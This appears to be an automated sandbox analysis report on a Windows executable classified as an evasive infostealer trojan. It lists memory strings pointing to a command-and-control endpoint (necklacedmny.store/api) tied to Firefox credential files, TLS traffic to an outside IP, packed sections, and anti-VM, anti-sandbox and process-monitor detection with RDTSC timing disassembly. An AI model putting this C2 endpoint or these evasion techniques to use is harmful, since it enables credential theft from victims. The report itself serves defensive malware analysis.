            Source: file.exe, file.exe, 00000000.00000003.2198596893.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197756892.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197549478.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2167680812.0000000001785000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238112404.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
            Source: file.exe, 00000000.00000002.2238361947.0000000001781000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api%4
            Source: file.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api2f
            Source: file.exe, 00000000.00000003.2216276849.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2233689266.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apid4d
            Source: file.exe, 00000000.00000002.2238112404.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apij
            Source: file.exe, 00000000.00000002.2238112404.00000000016F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apin
            Source: file.exe, 00000000.00000003.2197756892.0000000001780000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2197549478.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2238361947.0000000001781000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2216276849.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2233689266.0000000001780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apir4v
            Source: file.exe, 00000000.00000002.2238361947.0000000001766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/d
            Source: file.exe, 00000000.00000002.2238361947.0000000001766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/m
            Source: file.exe, 00000000.00000002.2238112404.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
            Source: file.exe, 00000000.00000002.2238112404.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiK
            Source: file.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.2142237199.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142179461.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142342284.0000000005DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: file.exe, 00000000.00000003.2168566128.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: file.exe, 00000000.00000003.2168566128.0000000005DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: file.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: file.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: file.exe, 00000000.00000003.2168640117.0000000005ED5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.2168878365.0000000005DC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068104F0_2_0068104F
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006960220_2_00696022
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067E1A00_2_0067E1A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006804600_2_00680460
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A15DC0_2_006A15DC
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067F7550_2_0067F755
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068D7F80_2_0068D7F8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AB7B00_2_006AB7B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F9D00_2_0069F9D0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006979B00_2_006979B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069AB200_2_0069AB20
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067EC200_2_0067EC20
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ABCA90_2_006ABCA9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E07E0_2_0068E07E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B50400_2_006B5040
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A50500_2_006A5050
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069702F0_2_0069702F
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AF0200_2_006AF020
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006710000_2_00671000
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006750000_2_00675000
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068D0100_2_0068D010
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006930E00_2_006930E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B40E00_2_006B40E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AB0F00_2_006AB0F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006770B00_2_006770B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B21650_2_006B2165
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006911000_2_00691100
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069A1120_2_0069A112
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006791E90_2_006791E9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067A2600_2_0067A260
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067B2400_2_0067B240
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069D2FD0_2_0069D2FD
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006712D50_2_006712D5
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008263840_2_00826384
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006993280_2_00699328
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006713280_2_00671328
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B53300_2_006B5330
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006983E20_2_006983E2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069B3D00_2_0069B3D0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069C3A60_2_0069C3A6
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083036D0_2_0083036D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006784600_2_00678460
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A44610_2_006A4461
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B24E00_2_006B24E0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082B40E0_2_0082B40E
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006814CE0_2_006814CE
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BD5630_2_006BD563
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F5700_2_0069F570
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006925200_2_00692520
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AA5230_2_006AA523
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071B5220_2_0071B522
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069A5100_2_0069A510
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B35F00_2_006B35F0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006865D70_2_006865D7
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007666330_2_00766633
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B46BB0_2_007B46BB
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083564D0_2_0083564D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0083766C0_2_0083766C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006937700_2_00693770
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B37400_2_006B3740
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067A7200_2_0067A720
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F73A0_2_0069F73A
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007557280_2_00755728
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B27000_2_006B2700
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AC7A00_2_006AC7A0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E8370_2_0068E837
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 0067C890 appears 37 times
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 0067E190 appears 98 times
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: ZLIB complexity 0.9980958561912225
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A2240 CoCreateInstance,0_2_006A2240
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.2142048452.0000000005DE6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142237199.0000000005DC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeString found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signatur
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 2948608 > 1048576
            Source: file.exeStatic PE information: Raw size of xzzshnci is bigger than: 0x100000 < 0x2a4400

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.670000.0.unpack :EW;.rsrc:W;.idata :W;xzzshnci:EW;tqazcifb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;xzzshnci:EW;tqazcifb:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x2d5122 should be: 0x2d6999
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name: xzzshnci
            Source: file.exeStatic PE information: section name: tqazcifb
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0177C55E push ecx; ret 0_3_0177C560
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017799CC push ebx; iretd 0_3_017799E1
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017799CC push eax; iretd 0_3_017799F9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_017799B2 push esi; iretd 0_3_017799C9
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0177A8A8 push 980177CBh; retf 0_3_0177A8AD
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0177A51F push ebx; retf 0_3_0177A520
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0177AC98 pushad ; iretd 0_3_0177AC9D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01779B03 push es; iretd 0_3_01779B49
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01782824 push 00D56339h; retf 0_3_0178283D
            Source: file.exeStatic PE information: section name: entropy: 7.9798196062320015

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CA21 second address: 82CA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82CA25 second address: 82CA2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84216D second address: 842179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F84084B1626h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842179 second address: 84217D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84217D second address: 84219E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B162Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007F84084B162Ch 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84219E second address: 8421AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8408BD9DA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842326 second address: 842348 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F84084B1626h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F84084B1632h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84497D second address: 844981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844981 second address: 84499A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84084B1630h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84499A second address: 844A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007F8408BD9DAEh 0x00000010 mov eax, dword ptr [eax] 0x00000012 jno 00007F8408BD9DC2h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ebx 0x0000001d jmp 00007F8408BD9DADh 0x00000022 pop ebx 0x00000023 pop eax 0x00000024 je 00007F8408BD9DACh 0x0000002a mov esi, dword ptr [ebp+122D325Eh] 0x00000030 push 00000003h 0x00000032 clc 0x00000033 sub si, 7366h 0x00000038 push 00000000h 0x0000003a push 00000003h 0x0000003c adc edi, 0969F5A5h 0x00000042 push B9C723FAh 0x00000047 jc 00007F8408BD9DAEh 0x0000004d jc 00007F8408BD9DA8h 0x00000053 push edx 0x00000054 pop edx 0x00000055 xor dword ptr [esp], 79C723FAh 0x0000005c and edi, 4F319D49h 0x00000062 lea ebx, dword ptr [ebp+12449862h] 0x00000068 push 00000000h 0x0000006a push edx 0x0000006b call 00007F8408BD9DA8h 0x00000070 pop edx 0x00000071 mov dword ptr [esp+04h], edx 0x00000075 add dword ptr [esp+04h], 00000018h 0x0000007d inc edx 0x0000007e push edx 0x0000007f ret 0x00000080 pop edx 0x00000081 ret 0x00000082 xchg eax, ebx 0x00000083 push eax 0x00000084 push edx 0x00000085 push esi 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844A54 second address: 844A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844A59 second address: 844A63 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408BD9DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844B57 second address: 844B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844B60 second address: 844B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 xor dword ptr [esp], 1EA732F7h 0x0000000f lea ebx, dword ptr [ebp+1244986Bh] 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F8408BD9DA6h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844C2C second address: 844C63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D1D5Ah], edi 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D1D38h], edx 0x00000015 push 0D7A688Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d jmp 00007F84084B1639h 0x00000022 pop edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 864757 second address: 86475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86475D second address: 864777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F84084B1635h 0x0000000a rdtsc
